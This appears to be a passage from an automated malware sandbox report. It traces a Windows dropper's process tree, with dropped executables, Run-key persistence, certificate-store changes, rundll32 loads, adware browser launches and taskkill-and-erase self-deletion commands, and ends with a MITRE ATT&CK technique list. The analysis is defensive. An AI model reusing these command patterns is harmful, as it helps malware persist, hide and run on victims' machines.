    - - C:\Users\Admin\AppData\Local\Temp\7zS40543434\Sun050462125c7d35.exe
        
        Sun050462125c7d35.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2120
      - C:\ProgramData\2893735.exe
        
        "C:\ProgramData\2893735.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2836
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2836 -s 1740
        7⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:3236
      - C:\ProgramData\1097815.exe
        
        "C:\ProgramData\1097815.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2900
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2304
      - C:\ProgramData\2977511.exe
        
        "C:\ProgramData\2977511.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:3060
        
        C:\ProgramData\2977511.exe
        
        "C:\ProgramData\2977511.exe"
        7⤵
        Executes dropped EXE
        
        PID:1688
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3060 -s 720
        7⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:3704
      - C:\ProgramData\6577916.exe
        
        "C:\ProgramData\6577916.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1504
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1504 -s 1624
        7⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:3892
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun05d60bc3b96248e5.exe
      4⤵
      Loads dropped DLL
      PID:948
    - - C:\Users\Admin\AppData\Local\Temp\7zS40543434\Sun05d60bc3b96248e5.exe
        
        Sun05d60bc3b96248e5.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:2080
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:2108
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:2256
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun05899db881f67fb29.exe
      4⤵
      Loads dropped DLL
      PID:392
    - - C:\Users\Admin\AppData\Local\Temp\7zS40543434\Sun05899db881f67fb29.exe
        
        Sun05899db881f67fb29.exe
        5⤵
        Executes dropped EXE
        
        PID:1248
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun054fe19a12cb3.exe
      4⤵
      Loads dropped DLL
      PID:1600
    - - C:\Users\Admin\AppData\Local\Temp\7zS40543434\Sun054fe19a12cb3.exe
        
        Sun054fe19a12cb3.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2148
      - C:\Users\Admin\AppData\Local\Temp\is-D875F.tmp\Sun054fe19a12cb3.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-D875F.tmp\Sun054fe19a12cb3.tmp" /SL5="$60130,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS40543434\Sun054fe19a12cb3.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2288
        
        C:\Users\Admin\AppData\Local\Temp\is-CFD5I.tmp\46807GHF____.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-CFD5I.tmp\46807GHF____.exe" /S /UID=burnerch2
        7⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        
        PID:2756
        
        C:\Program Files\Java\XSBWTJYDRA\ultramediaburner.exe
        
        "C:\Program Files\Java\XSBWTJYDRA\ultramediaburner.exe" /VERYSILENT
        8⤵
        Executes dropped EXE
        
        PID:2572
        
        C:\Users\Admin\AppData\Local\Temp\is-R4MPI.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-R4MPI.tmp\ultramediaburner.tmp" /SL5="$5017E,281924,62464,C:\Program Files\Java\XSBWTJYDRA\ultramediaburner.exe" /VERYSILENT
        9⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:852
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        10⤵
        Executes dropped EXE
        
        PID:2920
        
        C:\Users\Admin\AppData\Local\Temp\10-40d9d-043-0ad90-dc10b0b43bd1c\Siwutacuwae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10-40d9d-043-0ad90-dc10b0b43bd1c\Siwutacuwae.exe"
        8⤵
        Executes dropped EXE
        
        PID:2960
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
        9⤵
        Modifies Internet Explorer settings
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:2268
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2268 CREDAT:275457 /prefetch:2
        10⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:1308
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2268 CREDAT:209951 /prefetch:2
        10⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4528
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2268 CREDAT:1455119 /prefetch:2
        10⤵
        
        PID:4720
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2268 CREDAT:1586294 /prefetch:2
        10⤵
        
        PID:4116
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2268 CREDAT:668716 /prefetch:2
        10⤵
        
        PID:4072
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
        9⤵
        Modifies Internet Explorer settings
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:3800
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3800 CREDAT:275457 /prefetch:2
        10⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2452
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3800 CREDAT:340994 /prefetch:2
        10⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:3100
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3100 -s 1724
        11⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:3472
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851483
        9⤵
        
        PID:4504
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851513
        9⤵
        Modifies Internet Explorer settings
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:4508
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4508 CREDAT:275457 /prefetch:2
        10⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2468
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=2087215
        9⤵
        
        PID:1568
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1568 CREDAT:275457 /prefetch:2
        10⤵
        
        PID:3688
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.directdexchange.com/jump/next.php?r=4263119
        9⤵
        
        PID:8964
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?id=1294231
        9⤵
        
        PID:9024
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3
        9⤵
        
        PID:3868
        
        C:\Users\Admin\AppData\Local\Temp\2c-3d999-9bc-69c8f-2f4fab019623c\ZHazhulekema.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2c-3d999-9bc-69c8f-2f4fab019623c\ZHazhulekema.exe"
        8⤵
        Executes dropped EXE
        Modifies system certificate store
        
        PID:108
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2toctfds.iem\GcleanerEU.exe /eufive & exit
        9⤵
        
        PID:2132
        
        C:\Users\Admin\AppData\Local\Temp\2toctfds.iem\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\2toctfds.iem\GcleanerEU.exe /eufive
        10⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3564
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\2toctfds.iem\GcleanerEU.exe" & exit
        11⤵
        
        PID:3464
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "GcleanerEU.exe" /f
        12⤵
        Kills process with taskkill
        
        PID:2732
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pcjajfv5.j3a\installer.exe /qn CAMPAIGN="654" & exit
        9⤵
        
        PID:3844
        
        C:\Users\Admin\AppData\Local\Temp\pcjajfv5.j3a\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\pcjajfv5.j3a\installer.exe /qn CAMPAIGN="654"
        10⤵
        Executes dropped EXE
        Enumerates connected drives
        Modifies system certificate store
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        Suspicious use of FindShellTrayWindow
        
        PID:2876
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\pcjajfv5.j3a\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\pcjajfv5.j3a\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631210480 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        11⤵
        
        PID:832
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\penll4nu.ip2\anyname.exe & exit
        9⤵
        
        PID:3976
        
        C:\Users\Admin\AppData\Local\Temp\penll4nu.ip2\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\penll4nu.ip2\anyname.exe
        10⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2668
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g52irrgf.pxl\gcleaner.exe /mixfive & exit
        9⤵
        
        PID:3272
        
        C:\Users\Admin\AppData\Local\Temp\g52irrgf.pxl\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\g52irrgf.pxl\gcleaner.exe /mixfive
        10⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3292
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\g52irrgf.pxl\gcleaner.exe" & exit
        11⤵
        
        PID:1860
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "gcleaner.exe" /f
        12⤵
        Kills process with taskkill
        
        PID:2184
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3dvusyre.h3i\autosubplayer.exe /S & exit
        9⤵
        
        PID:2392
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun05fa3b4d2ae56e.exe /mixone
      4⤵
      Loads dropped DLL
      PID:2052
    - - C:\Users\Admin\AppData\Local\Temp\7zS40543434\Sun05fa3b4d2ae56e.exe
        
        Sun05fa3b4d2ae56e.exe /mixone
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2184
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "Sun05fa3b4d2ae56e.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS40543434\Sun05fa3b4d2ae56e.exe" & exit
        6⤵
        
        PID:1648
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "Sun05fa3b4d2ae56e.exe" /f
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1908

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Loads dropped DLL
PID:2848

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:2828

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:2908
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:2940

C:\Users\Admin\AppData\Local\Temp\67B8.exe
C:\Users\Admin\AppData\Local\Temp\67B8.exe
1⤵
- Executes dropped EXE
PID:2080

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:3588
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:3792

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:3612
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding AD2700C1B752FC9912172942B15C32DC C
  2⤵
  PID:3724
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding C1C7F424497551033027DFA8DC8131DC
  2⤵
  - Blocklisted process makes network request
  PID:3476
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:3764
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding A54D4645E7819F22F31854EB59890FDB M Global\MSI0000
  2⤵
  PID:1236

C:\Windows\system32\taskeng.exe
taskeng.exe {83F5AB69-C812-4C5A-A135-86F44BFCB7A4} S-1-5-21-1669990088-476967504-438132596-1000:KJUCCLUP\Admin:Interactive:[1]
1⤵
PID:2872
- C:\Users\Admin\AppData\Roaming\jcjdgdd
  C:\Users\Admin\AppData\Roaming\jcjdgdd
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:3388

C:\Users\Admin\AppData\Local\Temp\C830.exe
C:\Users\Admin\AppData\Local\Temp\C830.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2772

C:\Windows\system32\taskeng.exe
taskeng.exe {7BEC98F2-DA53-4E47-A070-CA95FAC76BB8} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1732
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
  2⤵
  PID:1048
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
  2⤵
  PID:4196
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
  2⤵
  PID:4552
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
  2⤵
  PID:4324
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
  2⤵
  PID:2544
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
  2⤵
  PID:2132

C:\Windows\system32\taskeng.exe
taskeng.exe {82731E65-4A8A-4713-B742-AFB862354C60} S-1-5-21-1669990088-476967504-438132596-1000:KJUCCLUP\Admin:Interactive:[1]
1⤵
PID:4056
- C:\Users\Admin\AppData\Roaming\jcjdgdd
  C:\Users\Admin\AppData\Roaming\jcjdgdd
  2⤵
  PID:6120
- C:\Users\Admin\AppData\Roaming\jcjdgdd
  C:\Users\Admin\AppData\Roaming\jcjdgdd
  2⤵
  PID:4400

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Install Root Certificate

T1130

Modify Registry

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Software Discovery

T1518

System Information Discovery